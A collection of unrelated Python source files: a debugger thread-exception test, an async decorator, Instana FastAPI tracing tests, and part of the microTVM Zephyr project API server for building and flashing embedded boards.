if not self.running:
self.running = True
logging.info("Starting the anomaly detector loop...")
# finally start the anomaly detection loop
self.processing = threading.Thread(target=self.__detect_anomalies__)
self.processing.start()
def halt(self):
"""
Destroys the application and halts the agents & turbines
"""
if self.running:
self.running = False
self.processing.join()
|
_debugger_case_unhandled_exceptions_custom.py
|
import threading, atexit, sys
import time
try:
from thread import start_new_thread
except:
from _thread import start_new_thread
class MyError(Exception):
def __init__(self, msg):
return Exception.__init__(self)
def _atexit():
print('TEST SUCEEDED')
sys.stderr.write('TEST SUCEEDED\n')
sys.stderr.flush()
sys.stdout.flush()
# Register the TEST SUCEEDED msg to the exit of the process.
atexit.register(_atexit)
def thread_func():
raise MyError('in thread 1')
start_new_thread(thread_func, ())
# Wait for the first to be handled... otherwise, tests can become flaky if
# both stop at the same time only 1 notification may be given for both, whereas
# the test expects 2 notifications.
time.sleep(.5)
def thread_func2(n):
raise MyError('in thread 2')
th = threading.Thread(target=lambda: thread_func2(1))
th.setDaemon(True)
th.start()
th.join()
# This is a bit tricky: although we waited on the event, there's a slight chance
# that we didn't get the notification because the thread could've stopped executing,
# so, sleep a bit so that the test does not become flaky.
time.sleep(.5)
raise MyError('in main')
|
decorator.py
|
'''
@Summary: Contains methods to be applied as python decorators
@Author: devopsec
'''
from threading import Thread
def run_async(f):
    """Run the decorated function in a fire-and-forget background thread.
    (Renamed from "async", which is a reserved keyword since Python 3.7.)"""
    def wrapper(*args, **kwargs):
        thr = Thread(target=f, args=args, kwargs=kwargs)
        thr.start()
        return thr  # return the thread so callers can join() if needed
    return wrapper
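# Hypothetical usage sketch (send_report and its argument are made up for
# illustration; the decorated call returns the worker thread, not f's result):
#
#   @run_async
#   def send_report(address):
#       ...  # slow I/O such as sending an email
#
#   worker = send_report("ops@example.com")  # returns immediately
#   worker.join()                            # optional: wait for completion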
|
test_fastapi.py
|
# (c) Copyright IBM Corp. 2021
# (c) Copyright Instana Inc. 2020
from __future__ import absolute_import
import time
import pytest
import requests
import multiprocessing
from instana.singletons import tracer
from ..helpers import testenv
from ..helpers import get_first_span_by_filter
@pytest.fixture(scope="module")
def server():
from tests.apps.fastapi_app import launch_fastapi
proc = multiprocessing.Process(target=launch_fastapi, args=(), daemon=True)
proc.start()
time.sleep(2)
yield
proc.kill() # Kill server after tests
def test_vanilla_get(server):
result = requests.get(testenv["fastapi_server"] + '/')
assert result.status_code == 200
assert "X-INSTANA-T" in result.headers
assert "X-INSTANA-S" in result.headers
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
spans = tracer.recorder.queued_spans()
# FastAPI instrumentation (like all instrumentation) _always_ traces unless told otherwise
assert len(spans) == 1
assert spans[0].n == 'asgi'
def test_basic_get(server):
result = None
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/')
assert result.status_code == 200
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == "asgi"
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/')
assert (asgi_span.data['http']['path_tpl'] == '/')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 200)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] is None)
def test_400(server):
result = None
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/400')
assert result.status_code == 400
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/400')
assert (asgi_span.data['http']['path_tpl'] == '/400')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 400)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] is None)
def test_500(server):
result = None
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/500')
assert result.status_code == 500
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == 1)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/500')
assert (asgi_span.data['http']['path_tpl'] == '/500')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 500)
assert (asgi_span.data['http']['error'] == '500 response')
assert (asgi_span.data['http']['params'] is None)
def test_path_templates(server):
result = None
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/users/1')
assert result.status_code == 200
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/users/1')
assert (asgi_span.data['http']['path_tpl'] == '/users/{user_id}')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 200)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] is None)
def test_secret_scrubbing(server):
result = None
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/?secret=shhh')
assert result.status_code == 200
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/')
assert (asgi_span.data['http']['path_tpl'] == '/')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 200)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] == 'secret=<redacted>')
def test_synthetic_request(server):
request_headers = {
'X-INSTANA-SYNTHETIC': '1'
}
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/', headers=request_headers)
assert result.status_code == 200
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/')
assert (asgi_span.data['http']['path_tpl'] == '/')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 200)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] is None)
assert (asgi_span.sy)
assert (urllib3_span.sy is None)
assert (test_span.sy is None)
def test_custom_header_capture(server):
from instana.singletons import agent
# The background FastAPI server is pre-configured with custom headers to capture
request_headers = {
'X-Capture-This': 'this',
'X-Capture-That': 'that'
}
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/', headers=request_headers)
assert result.status_code == 200
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/')
assert (asgi_span.data['http']['path_tpl'] == '/')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 200)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] is None)
assert ("X-Capture-This" in asgi_span.data["http"]["header"])
assert ("this" == asgi_span.data["http"]["header"]["X-Capture-This"])
assert ("X-Capture-That" in asgi_span.data["http"]["header"])
assert ("that" == asgi_span.data["http"]["header"]["X-Capture-That"])
|
microtvm_api_server.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import atexit
import collections
import collections.abc
import copy
import enum
import fcntl
import json
import logging
import os
import os.path
import pathlib
import queue
import re
import select
import shlex
import shutil
import subprocess
import sys
import tarfile
import tempfile
import threading
import time
import usb
import serial
import serial.tools.list_ports
import yaml
from tvm.micro.project_api import server
_LOG = logging.getLogger(__name__)
API_SERVER_DIR = pathlib.Path(os.path.dirname(__file__) or os.getcwd())
BUILD_DIR = API_SERVER_DIR / "build"
MODEL_LIBRARY_FORMAT_RELPATH = "model.tar"
IS_TEMPLATE = not (API_SERVER_DIR / MODEL_LIBRARY_FORMAT_RELPATH).exists()
BOARDS = API_SERVER_DIR / "boards.json"
# Used to check Zephyr version installed on the host.
# We only check two levels of the version.
ZEPHYR_VERSION = 2.7
WEST_CMD = sys.executable + " -m west" if sys.executable else None
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
# Data structure to hold the information microtvm_api_server.py needs
# to communicate with each of these boards.
try:
with open(BOARDS) as boards:
BOARD_PROPERTIES = json.load(boards)
except FileNotFoundError:
raise FileNotFoundError(f"Board file {{{BOARDS}}} does not exist.")
def check_call(cmd_args, *args, **kwargs):
cwd_str = "" if "cwd" not in kwargs else f" (in cwd: {kwargs['cwd']})"
_LOG.info("run%s: %s", cwd_str, " ".join(shlex.quote(a) for a in cmd_args))
return subprocess.check_call(cmd_args, *args, **kwargs)
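# A CMakeCache.txt entry looks like "BOARD:STRING=qemu_x86"; the regex below splits
# it into a name ("BOARD"), a type ("STRING") and a value ("qemu_x86").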
CACHE_ENTRY_RE = re.compile(r"(?P<name>[^:]+):(?P<type>[^=]+)=(?P<value>.*)")
CMAKE_BOOL_MAP = dict(
[(k, True) for k in ("1", "ON", "YES", "TRUE", "Y")]
+ [(k, False) for k in ("0", "OFF", "NO", "FALSE", "N", "IGNORE", "NOTFOUND", "")]
)
class CMakeCache(collections.abc.Mapping):
def __init__(self, path):
self._path = path
self._dict = None
def __iter__(self):
return iter(self._dict)
def __getitem__(self, key):
if self._dict is None:
self._dict = self._read_cmake_cache()
return self._dict[key]
def __len__(self):
return len(self._dict)
def _read_cmake_cache(self):
"""Read a CMakeCache.txt-like file and return a dictionary of values."""
entries = collections.OrderedDict()
with open(self._path, encoding="utf-8") as f:
for line in f:
m = CACHE_ENTRY_RE.match(line.rstrip("\n"))
if not m:
continue
if m.group("type") == "BOOL":
value = CMAKE_BOOL_MAP[m.group("value").upper()]
else:
value = m.group("value")
entries[m.group("name")] = value
return entries
CMAKE_CACHE = CMakeCache(BUILD_DIR / "CMakeCache.txt")
class BoardError(Exception):
"""Raised when an attached board cannot be opened (i.e. missing /dev nodes, etc)."""
class BoardAutodetectFailed(Exception):
"""Raised when no attached hardware is found matching the board= given to ZephyrCompiler."""
def _get_flash_runner():
flash_runner = CMAKE_CACHE.get("ZEPHYR_BOARD_FLASH_RUNNER")
if flash_runner is not None:
return flash_runner
with open(CMAKE_CACHE["ZEPHYR_RUNNERS_YAML"]) as f:
doc = yaml.load(f, Loader=yaml.FullLoader)
return doc["flash-runner"]
def _get_device_args(options):
flash_runner = _get_flash_runner()
if flash_runner == "nrfjprog":
return _get_nrf_device_args(options)
if flash_runner == "openocd":
return _get_openocd_device_args(options)
raise BoardError(
f"Don't know how to find serial terminal for board {CMAKE_CACHE['BOARD']} with flash "
f"runner {flash_runner}"
)
def generic_find_serial_port(serial_number=None):
"""Find a USB serial port based on its serial number or its VID:PID.
This method finds a USB serial port device path based on the port's serial number (if given) or
based on the board's idVendor and idProduct ids.
Parameters
----------
serial_number : str
The serial number associated to the USB serial port which the board is attached to. This is
the same number as shown by 'lsusb -v' in the iSerial field.
Returns
-------
Path to the USB serial port device, for example /dev/ttyACM1.
"""
if serial_number:
regex = serial_number
else:
prop = BOARD_PROPERTIES[CMAKE_CACHE["BOARD"]]
device_id = ":".join([prop["vid_hex"], prop["pid_hex"]])
regex = device_id
serial_ports = list(serial.tools.list_ports.grep(regex))
if len(serial_ports) == 0:
raise Exception(f"No serial port found for board {prop['board']}!")
if len(serial_ports) != 1:
ports_lst = ""
for port in serial_ports:
ports_lst += f"Serial port: {port.device}, serial number: {port.serial_number}\n"
raise Exception("Expected 1 serial port, found multiple ports:\n {ports_lst}")
return serial_ports[0].device
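# generic_find_serial_port example (hypothetical serial number): a call such as
# generic_find_serial_port("683339521") returns a device path like "/dev/ttyACM1"
# when exactly one attached board reports that iSerial value.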
def _get_openocd_device_args(options):
serial_number = options.get("openocd_serial")
return ["--serial", generic_find_serial_port(serial_number)]
def _get_nrf_device_args(options):
nrfjprog_args = ["nrfjprog", "--ids"]
nrfjprog_ids = subprocess.check_output(nrfjprog_args, encoding="utf-8")
if not nrfjprog_ids.strip("\n"):
raise BoardAutodetectFailed(f'No attached boards recognized by {" ".join(nrfjprog_args)}')
boards = nrfjprog_ids.split("\n")[:-1]
if len(boards) > 1:
if options["nrfjprog_snr"] is None:
raise BoardError(
"Multiple boards connected; specify one with nrfjprog_snr=: " f'{", ".join(boards)}'
)
if str(options["nrfjprog_snr"]) not in boards:
raise BoardError(
f"nrfjprog_snr ({options['nrfjprog_snr']}) not found in {nrfjprog_args}: {boards}"
)
return ["--snr", options["nrfjprog_snr"]]
if not boards:
return []
return ["--snr", boards[0]]
PROJECT_TYPES = []
if IS_TEMPLATE:
for d in (API_SERVER_DIR / "src").iterdir():
if d.is_dir():
PROJECT_TYPES.append(d.name)
PROJECT_OPTIONS = [
server.ProjectOption(
"extra_files_tar",
optional=["generate_project"],
type="str",
help="If given, during generate_project, uncompress the tarball at this path into the project dir.",
),
server.ProjectOption(
"gdbserver_port",
help=("If given, port number to use when running the local gdbserver."),
optional=["open_transport"],
type="int",
),
server.ProjectOption(
"nrfjprog_snr",
optional=["open_transport"],
type="int",
help=("When used with nRF targets, serial # of the attached board to use, from nrfjprog."),
),
server.ProjectOption(
"openocd_serial",
optional=["open_transport"],
type="int",
help=("When used with OpenOCD targets, serial # of the attached board to use."),
),
server.ProjectOption(
"project_type",
choices=tuple(PROJECT_TYPES),
required=["generate_project"],
type="str",
help="Type of project to generate.",
),
server.ProjectOption(
"verbose",
optional=["build"],
type="bool",
help="Run build with verbose output.",
),
server.ProjectOption(
"west_cmd",
optional=["build"],
default=WEST_CMD,
type="str",
help=(
"Path to the west tool. If given, supersedes both the zephyr_base "
"option and ZEPHYR_BASE environment variable."
),
),
server.ProjectOption(
"zephyr_base",
required=(["generate_project", "open_transport"] if not ZEPHYR_BASE else None),
optional=(["generate_project", "open_transport", "build"] if ZEPHYR_BASE else ["build"]),
default=ZEPHYR_BASE,
type="str",
help="Path to the zephyr base directory.",
),
server.ProjectOption(
"zephyr_board",
required=["generate_project", "build", "flash", "open_transport"],
choices=list(BOARD_PROPERTIES),
type="str",
help="Name of the Zephyr board to build for.",
),
server.ProjectOption(
"config_main_stack_size",
optional=["generate_project"],
type="int",
help="Sets CONFIG_MAIN_STACK_SIZE for Zephyr board.",
),
server.ProjectOption(
"warning_as_error",
optional=["generate_project"],
type="bool",
help="Treat warnings as errors and raise an Exception.",
),
server.ProjectOption(
"compile_definitions",
optional=["generate_project"],
type="str",
help="Extra definitions added project compile.",
),
]
def get_zephyr_base(options: dict):
"""Returns Zephyr base path"""
zephyr_base = options.get("zephyr_base", ZEPHYR_BASE)
assert zephyr_base, "'zephyr_base' option not passed and not found by default!"
return zephyr_base
class Handler(server.ProjectAPIHandler):
def __init__(self):
super(Handler, self).__init__()
self._proc = None
def server_info_query(self, tvm_version):
return server.ServerInfo(
platform_name="zephyr",
is_template=IS_TEMPLATE,
model_library_format_path=""
if IS_TEMPLATE
else (API_SERVER_DIR / MODEL_LIBRARY_FORMAT_RELPATH),
project_options=PROJECT_OPTIONS,
)
# These files and directories will be recursively copied into generated projects from the CRT.
CRT_COPY_ITEMS = ("include", "Makefile", "src")
# Maps extra line added to prj.conf to a tuple or list of zephyr_board for which it is needed.
EXTRA_PRJ_CONF_DIRECTIVES = {
"CONFIG_TIMER_RANDOM_GENERATOR=y": (
"qemu_x86",
"qemu_riscv32",
"qemu_cortex_r5",
"qemu_riscv64",
),
"CONFIG_ENTROPY_GENERATOR=y": (
"mps2_an521",
"nrf5340dk_nrf5340_cpuapp",
"nucleo_f746zg",
"nucleo_l4r5zi",
"stm32f746g_disco",
),
}
def _create_prj_conf(self, project_dir, options):
with open(project_dir / "prj.conf", "w") as f:
f.write(
"# For UART used from main().\n"
"CONFIG_RING_BUFFER=y\n"
"CONFIG_UART_CONSOLE=n\n"
"CONFIG_UART_INTERRUPT_DRIVEN=y\n"
"\n"
)
f.write("# For TVMPlatformAbort().\n" "CONFIG_REBOOT=y\n" "\n")
if options["project_type"] == "host_driven":
f.write(
"# For RPC server C++ bindings.\n"
"CONFIG_CPLUSPLUS=y\n"
"CONFIG_LIB_CPLUSPLUS=y\n"
"\n"
)
f.write("# For math routines\n" "CONFIG_NEWLIB_LIBC=y\n" "\n")
if self._has_fpu(options["zephyr_board"]):
f.write("# For models with floating point.\n" "CONFIG_FPU=y\n" "\n")
# Set main stack size, if needed.
if options.get("config_main_stack_size") is not None:
f.write(f"CONFIG_MAIN_STACK_SIZE={options['config_main_stack_size']}\n")
f.write("# For random number generation.\n" "CONFIG_TEST_RANDOM_GENERATOR=y\n")
f.write("\n# Extra prj.conf directives\n")
for line, board_list in self.EXTRA_PRJ_CONF_DIRECTIVES.items():
if options["zephyr_board"] in board_list:
f.write(f"{line}\n")
f.write("\n")
API_SERVER_CRT_LIBS_TOKEN = "<API_SERVER_CRT_LIBS>"
CRT_LIBS_BY_PROJECT_TYPE = {
"host_driven": "microtvm_rpc_server microtvm_rpc_common common",
"aot_demo": "memory microtvm_rpc_common common",
}
def _get_platform_version(self, zephyr_base: str) -> float:
with open(pathlib.Path(zephyr_base) / "VERSION", "r") as f:
lines = f.readlines()
for line in lines:
line = line.replace(" ", "").replace("\n", "").replace("\r", "")
if "VERSION_MAJOR" in line:
version_major = line.split("=")[1]
if "VERSION_MINOR" in line:
version_minor = line.split("=")[1]
return float(f"{version_major}.{version_minor}")
def generate_project(self, model_library_format_path, standalone_crt_dir, project_dir, options):
# Check Zephyr version
version = self._get_platform_version(get_zephyr_base(options))
if version != ZEPHYR_VERSION:
message = f"Zephyr version found is not supported: found {version}, expected {ZEPHYR_VERSION}."
if options.get("warning_as_error") is not None and options["warning_as_error"]:
raise server.ServerError(message=message)
_LOG.warning(message)
project_dir = pathlib.Path(project_dir)
# Make project directory.
project_dir.mkdir()
# Copy ourselves to the generated project. TVM may perform further build steps on the generated project
# by launching the copy.
shutil.copy2(__file__, project_dir / os.path.basename(__file__))
# Copy boards.json file to generated project.
shutil.copy2(BOARDS, project_dir / BOARDS.name)
# Place Model Library Format tarball in the special location, which this script uses to decide
# whether it's being invoked in a template or generated project.
project_model_library_format_tar_path = project_dir / MODEL_LIBRARY_FORMAT_RELPATH
shutil.copy2(model_library_format_path, project_model_library_format_tar_path)
        # Extract Model Library Format tarball into <project_dir>/model.
extract_path = os.path.splitext(project_model_library_format_tar_path)[0]
with tarfile.TarFile(project_model_library_format_tar_path) as tf:
os.makedirs(extract_path)
tf.extractall(path=extract_path)
if self._is_qemu(options):
shutil.copytree(API_SERVER_DIR / "qemu-hack", project_dir / "qemu-hack")
# Populate CRT.
crt_path = project_dir / "crt"
crt_path.mkdir()
for item in self.CRT_COPY_ITEMS:
src_path = os.path.join(standalone_crt_dir, item)
dst_path = crt_path / item
if os.path.isdir(src_path):
shutil.copytree(src_path, dst_path)
else:
shutil.copy2(src_path, dst_path)
# Populate Makefile.
with open(API_SERVER_DIR / "CMakeLists.txt.template", "r") as cmake_template_f:
with open(project_dir / "CMakeLists.txt", "w") as cmake_f:
for line in cmake_template_f:
if self.API_SERVER_CRT_LIBS_TOKEN in line:
crt_libs = self.CRT_LIBS_BY_PROJECT_TYPE[options["project_type"]]
line = line.replace("<API_SERVER_CRT_LIBS>", crt_libs)
cmake_f.write(line)
if options.get("compile_definitions"):
flags = options.get("compile_definitions")
for item in flags:
cmake_f.write(f"target_compile_definitions(app PUBLIC {item})\n")
self._create_prj_conf(project_dir, options)
# Populate crt-config.h
crt_config_dir = project_dir / "crt_config"
crt_config_dir.mkdir()
shutil.copy2(
API_SERVER_DIR / "crt_config" / "crt_config.h", crt_config_dir / "crt_config.h"
)
# Populate src/
src_dir = project_dir / "src"
shutil.copytree(API_SERVER_DIR / "src" / options["project_type"], src_dir)
# Populate extra_files
if options.get("extra_files_tar"):
with tarfile.open(options["extra_files_tar"], mode="r:*") as tf:
tf.extractall(project_dir)
def build(self, options):
BUILD_DIR.mkdir()
cmake_args = ["cmake", ".."]
if options.get("verbose"):
cmake_args.append("-DCMAKE_VERBOSE_MAKEFILE:BOOL=TRUE")
if options.get("zephyr_base"):
cmake_args.append(f"-DZEPHYR_BASE:STRING={options['zephyr_base']}")
if options.get("west_cmd"):
cmake_args.append(f"-DWEST={options['west_cmd']}")
cmake_args.append(f"-DBOARD:STRING={options['zephyr_board']}")
check_call(cmake_args, cwd=BUILD_DIR)
args = ["make", "-j2"]
if options.get("verbose"):
args.append("VERBOSE=1")
check_call(args, cwd=BUILD_DIR)
# A list of all zephyr_board values which are known to launch using QEMU. Many platforms which
# launch through QEMU by default include "qemu" in their name. However, not all do. This list
# includes those tested platforms which do not include qemu.
_KNOWN_QEMU_ZEPHYR_BOARDS = ("mps2_an521",)
@classmethod
def _is_qemu(cls, options):
return (
"qemu" in options["zephyr_board"]
or options["zephyr_board"] in cls._KNOWN_QEMU_ZEPHYR_BOARDS
)
@classmethod
def _has_fpu(cls, zephyr_board):
fpu_boards = [name for name, board in BOARD_PROPERTIES.items() if board["fpu"]]
return zephyr_board in fpu_boards
def flash(self, options):
if self._is_qemu(options):
return # NOTE: qemu requires no flash step--it is launched from open_transport.
zephyr_board = options["zephyr_board"]
# The nRF5340DK requires an additional `nrfjprog --recover` before each flash cycle.
# This is because readback protection is enabled by default when this device is flashed.
# Otherwise, flashing may fail with an error such as the following:
# ERROR: The operation attempted is unavailable due to readback protection in
# ERROR: your device. Please use --recover to unlock the device.
if zephyr_board.startswith("nrf5340dk") and _get_flash_runner() == "nrfjprog":
recover_args = ["nrfjprog", "--recover"]
recover_args.extend(_get_nrf_device_args(options))
check_call(recover_args, cwd=API_SERVER_DIR / "build")
check_call(["make", "flash"], cwd=API_SERVER_DIR / "build")
def open_transport(self, options):
if self._is_qemu(options):
transport = ZephyrQemuTransport(options)
else:
transport = ZephyrSerialTransport(options)
to_return = transport.open()
self._transport = transport
atexit.register(lambda: self.close_transport())
return to_return
def close_transport(self):
if self._transport is not None:
self._transport.close()
self._transport = None
def read_transport(self, n, timeout_sec):
if self._transport is None:
raise server.TransportClosedError()
return self._transport.read(n, timeout_sec)
def write_transport(self, data, timeout_sec):
if self._transport is None:
raise server.TransportClosedError()
return self._transport.write(data, timeout_sec)
def _set_nonblock(fd):
flag = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flag | os.O_NONBLOCK)
new_flag = fcntl.fcntl(fd, fcntl.F_GETFL)
    assert (new_flag & os.O_NONBLOCK) != 0, f"Cannot set file descriptor {fd} to non-blocking"
class ZephyrSerialTransport:
NRF5340_VENDOR_ID = 0x1366
# NRF5340_DK v1.0.0 uses VCOM2
# NRF5340_DK v2.0.0 uses VCOM1
NRF5340_DK_BOARD_VCOM_BY_PRODUCT_ID = {0x1055: "VCOM2", 0x1051: "VCOM1"}
@classmethod
def _lookup_baud_rate(cls, options):
# TODO(mehrdadh): remove this hack once dtlib.py is a standalone project
# https://github.com/zephyrproject-rtos/zephyr/blob/v2.7-branch/scripts/dts/README.txt
sys.path.insert(
0,
os.path.join(
get_zephyr_base(options), "scripts", "dts", "python-devicetree", "src", "devicetree"
),
)
try:
import dtlib # pylint: disable=import-outside-toplevel
finally:
sys.path.pop(0)
